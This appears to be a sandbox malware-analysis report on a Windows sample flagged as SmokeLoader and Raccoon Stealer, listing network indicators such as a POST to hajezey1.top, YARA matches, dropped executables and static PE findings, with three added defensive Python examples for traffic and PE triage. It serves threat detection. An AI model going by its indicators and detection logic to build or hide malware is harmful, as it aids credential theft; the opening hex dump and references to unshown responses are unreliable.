6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc 
ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
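The chunked 404 responses above (the Apache one and the two nginx ones) declare `Content-Type: text/html; charset=utf-8`, yet their bodies consist of a chunk-size line (`3b9202`, `1f42`) followed by bytes such as `00 00 ...` that cannot be UTF-8 HTML, while the other 404s from the same servers carry an ordinary HTML error page. A content-type/body mismatch of that kind is a cheap check to run over captured traffic. The following is an added example, not code from this sandbox report or from any tool it names; the two sample responses are constructed (the first copies the shape of the HTML 404s above, the second reuses the chunked headers but its body bytes are made up, since the report's dumps are truncated).

```python
"""Flag HTTP responses whose declared text/html body is really binary data.

Added example, not part of the sandbox report. Sample responses are constructed.
"""


def parse_headers(head: bytes):
    """Return (status line, {lower-cased header name: value})."""
    lines = head.split(b"\r\n")
    status = lines[0].decode("latin-1")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return status, headers


def dechunk(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body, tolerating a truncated capture."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol == -1:
            break                       # no chunk-size line left: truncated or done
        size_field = body[pos:eol].split(b";")[0].strip()
        if not size_field:
            break
        size = int(size_field, 16)
        if size == 0:
            break                       # last-chunk marker
        data = body[eol + 2:eol + 2 + size]
        out += data
        if len(data) < size:
            break                       # capture ended mid-chunk; keep what we have
        pos = eol + 2 + size + 2        # skip the CRLF that terminates the chunk
    return bytes(out)


def parse_response(raw: bytes):
    """Split a raw response into (status line, headers, decoded body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, headers = parse_headers(head)
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    return status, headers, body


def binary_ratio(body: bytes) -> float:
    """Fraction of bytes that are neither printable ASCII nor tab/CR/LF."""
    if not body:
        return 0.0
    text = sum(1 for b in body if 32 <= b < 127 or b in (9, 10, 13))
    return (len(body) - text) / len(body)


def is_mismatched(raw: bytes, threshold: float = 0.30) -> bool:
    """True when the response claims a text/* body but the bytes are not text.

    A text/html; charset=utf-8 body can never legitimately contain NUL bytes,
    so that is checked first; the ratio test catches bodies without NULs.
    """
    _, headers, body = parse_response(raw)
    if not headers.get("content-type", "").lower().startswith("text/"):
        return False
    return b"\x00" in body or binary_ratio(body) > threshold


# Constructed sample 1: a plain HTML 404 like the Apache/nginx ones in the report.
HTML_404 = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Server: nginx/1.20.1\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: 67\r\n\r\n"
    b"<html><head><title>404 Not Found</title></head><body></body></html>"
)

# Constructed sample 2: the chunked 404 headers from the report, a chunk-size
# line of 0x1f42 bytes, then made-up binary that is cut off early.
BINARY_404 = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Server: nginx/1.20.1\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n"
    b"1f42\r\n" + b"\x00\x00" + bytes(range(1, 256)) * 4
)
```

The threshold of 30 % non-text bytes is an assumption chosen to tolerate compressed or non-ASCII HTML; the NUL-byte test alone already catches both binary 404s shown above, whose bodies start with `00 00`. On a real capture the raw bytes would come from a pcap reassembly rather than the constructed constants here.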
Source: unknown TCP traffic detected without corresponding DNS query: 23.211.6.115 (50 identical detections)
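The "TCP traffic detected without corresponding DNS query" signature above is a correlation between DNS answers and outbound connections: any destination IP that never appeared in an A-record answer during the capture is reported. The following is an added example of that correlation, not the sandbox's own detection code. The event list is constructed for illustration: 23.211.6.115 and 193.56.146.214 appear in this report, but the host names, timestamps and event order are made up, and a real run would feed events parsed from a pcap instead.

```python
"""Flag outbound TCP connections to IPs that no DNS answer resolved.

Added example, not part of the sandbox report. Events are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: float       # seconds since capture start
    kind: str       # "dns" (an A-record answer) or "tcp" (an outbound SYN)
    ip: str         # answer IP for dns, destination IP for tcp
    port: int = 0   # destination port for tcp
    name: str = ""  # queried name for dns (constructed values below)


def unresolved_connections(events):
    """Return the TCP events whose destination was never seen in a DNS answer.

    Events are processed in time order, so a connection made before the name
    resolves is flagged even if a later answer covers the same IP.
    """
    resolved = set()
    flagged = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "dns":
            resolved.add(ev.ip)
        elif ev.kind == "tcp" and ev.ip not in resolved:
            flagged.append(ev)
    return flagged


def summarize(events):
    """Map each unresolved destination IP to the sorted list of ports contacted.

    Many distinct ports on one unresolved IP is the pattern behind the
    report's "connects to many ports of the same IP" signature.
    """
    ports = defaultdict(set)
    for ev in unresolved_connections(events):
        ports[ev.ip].add(ev.port)
    return {ip: sorted(p) for ip, p in ports.items()}


# Constructed event log; host names and timing are invented.
SAMPLE_EVENTS = [
    Event(0.5, "dns", "193.56.146.214", name="c2.example"),
    Event(0.7, "tcp", "193.56.146.214", 80),     # resolved first: not flagged
    Event(1.0, "tcp", "23.211.6.115", 443),      # never resolved yet: flagged
    Event(1.1, "tcp", "23.211.6.115", 80),
    Event(1.4, "tcp", "23.211.6.115", 8080),
    Event(2.0, "dns", "23.211.6.115", name="cdn.example"),
    Event(2.2, "tcp", "23.211.6.115", 443),      # resolved by now: not flagged
]
```

Two caveats apply when reading such hits: a name resolved before the capture started, or served from the OS resolver cache, produces a false positive for an otherwise benign endpoint, and a sample that resolves names over DoH or contacts hard-coded IPs is caught only by this check, not by DNS monitoring alone. The report itself does not say which of these applies to 23.211.6.115.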
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hdytesri.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: hajezey1.top
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: unknown HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.3:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49892 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49900 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49899 version: TLS 1.2
Source: unknown HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50104 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50105 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:50111 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50123 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.3:50127 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.3:50129 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.160.132:443 -> 192.168.2.3:50130 version: TLS 1.2
Source: unknown HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50139 version: TLS 1.2
Source: unknown HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:50141 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader
Source: Yara match File source: 29.3.CBF0.exe.3080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.CBF0.exe.3070e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.CBF0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Md0q201V1D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.21.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Md0q201V1D.exe.2d815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.1.21.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.gbhudtb.2cb15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.gbhudtb.2be15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.21.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.1.gbhudtb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.21.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.21.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.326584645.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.400930179.0000000002061000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.400697119.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.438106147.0000000003080000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.449845582.0000000000561000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.449446646.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.338103224.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.481901309.00000000048F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.453324146.00000000031C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.453199313.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.338316447.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.480747015.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: 21.exe, 00000010.00000002.389134308.0000000002D3A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer
Source: Yara match File source: 35.3.C066.exe.4960000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.C066.exe.4960000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.479598454.0000000004960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: C066.exe PID: 5604, type: MEMORYSTR

System Summary:

.NET source code contains very large array initializations
Source: BBE1.exe.10.dr, ???????????????.cs Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
Source: D8D0.exe.10.dr, ue60aue64bue63aue60cue62cue60aue610ue60fue63aue63due63aue60bue61cue63cue623.cs Large array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
PE file contains section with special chars
Source: F1AC.exe.10.dr Static PE information: section name: Cgw(O~.
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56AB40 29_2_6B56AB40
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B563360 29_2_6B563360
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56A309 29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57ABD8 29_2_6B57ABD8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B598BE8 29_2_6B598BE8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F23E3 29_2_6B5F23E3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5EEB8A 29_2_6B5EEB8A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57EBB0 29_2_6B57EBB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FFA2B 29_2_6B5FFA2B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60E2C5 29_2_6B60E2C5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B6132A9 29_2_6B6132A9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B562990 29_2_6B562990
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B578840 29_2_6B578840
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B546800 29_2_6B546800
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601002 29_2_6B601002
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56A830 29_2_6B56A830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55B090 29_2_6B55B090
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B6067E2 29_2_6B6067E2
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5CAE60 29_2_6B5CAE60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B566E30 29_2_6B566E30
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B612EF7 29_2_6B612EF7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B562D50 29_2_6B562D50
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B611D55 29_2_6B611D55
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B540D20 29_2_6B540D20
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5735D0 29_2_6B5735D0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B562430 29_2_6B562430
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604496 29_2_6B604496
PE file contains strange resources
Source: CAC5.exe.10.dr Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: CAC5.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CAC5.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CAC5.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CAC5.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CAC5.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F11E.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F11E.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CBF0.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Uses 32bit PE files
Source: Md0q201V1D.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
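The two static checks above (a section named "Cgw(O~." in F1AC.exe, and the 32BIT_MACHINE / EXECUTABLE_IMAGE characteristics of Md0q201V1D.exe) come straight from the PE file header and section table, so they can be reproduced without a sandbox. The following is an added example, not code from the report or from the sandbox vendor: a pure-Python header walk that returns the characteristics flags and section names, plus a check for section names containing characters outside what a normal linker emits (that character set is an assumption). The PE image it parses is constructed in memory for the demo (header only, not loadable); no bytes from the analysed sample are embedded.

```python
"""Added example: minimal static PE triage in pure Python (stdlib only).
Reproduces the '32BIT_MACHINE, EXECUTABLE_IMAGE' and 'section name with
special chars' findings of the report.  The PE image is constructed here
for the demo; nothing from the real sample is included."""
import string
import struct

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100
CHARACTERISTIC_NAMES = {
    IMAGE_FILE_EXECUTABLE_IMAGE: "EXECUTABLE_IMAGE",
    IMAGE_FILE_32BIT_MACHINE: "32BIT_MACHINE",
}
# Assumption: characters a compiler/linker normally emits in a section name.
NORMAL_SECTION_CHARS = set(string.ascii_letters + string.digits + "_.$")


def parse_pe(data: bytes) -> dict:
    """Return machine, characteristics flag names and section names of a PE blob.
    Raises ValueError on anything that is not a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4  # IMAGE_FILE_HEADER (20 bytes)
    machine, nsec, _ts, _symptr, _nsym, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, fh)
    flags = [name for bit, name in CHARACTERISTIC_NAMES.items() if chars & bit]
    sec_table = fh + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(nsec):
        raw = struct.unpack_from("8s", data, sec_table + i * 40)[0]
        sections.append(raw.rstrip(b"\0").decode("latin-1"))
    return {"machine": machine, "characteristics": flags, "sections": sections}


def suspicious_sections(names):
    """Section names containing characters outside NORMAL_SECTION_CHARS."""
    return [n for n in names if any(c not in NORMAL_SECTION_CHARS for c in n)]


def build_demo_pe(section_names,
                  characteristics=IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE) -> bytes:
    """Constructed minimal PE32 header (DOS stub, file header, empty optional
    header, section table) for the demo.  Not a loadable image."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew -> right after the stub
    opt = bytearray(224)                               # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)              # PE32 magic
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(section_names),
                           0, 0, 0, len(opt), characteristics)
    secs = b"".join(struct.pack("8s", n.encode("latin-1")) + b"\0" * 32
                    for n in section_names)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + secs


if __name__ == "__main__":
    pe = build_demo_pe([".text", ".rdata", "Cgw(O~."])
    info = parse_pe(pe)
    print(info["characteristics"], info["sections"])
    print("suspicious sections:", suspicious_sections(info["sections"]))
```

On a real dropped file, replace `build_demo_pe(...)` with `open(path, "rb").read()`; the parser only reads the headers, so it is safe to run on hostile input as long as the file is never executed.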
Yara signature match
Source: 39.0.DF3A.exe.ed0000.11.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.DF3A.exe.a40000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B096.exe.a00000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.2.B096.exe.a00000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.13.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.DF3A.exe.a40000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.DF3A.exe.a40000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B096.exe.a00000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.BBE1.exe.790000.1.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.BBE1.exe.790000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.BBE1.exe.790000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 39.0.DF3A.exe.ed0000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 31.0.DF3A.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 27.0.BBE1.exe.790000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B096.exe.a00000.3.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 24.0.B096.exe.a00000.2.unpack, type: UNPACKEDPE Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\DF3A.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: C:\Users\user\AppData\Local\Temp\B096.exe, type: DROPPED Matched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
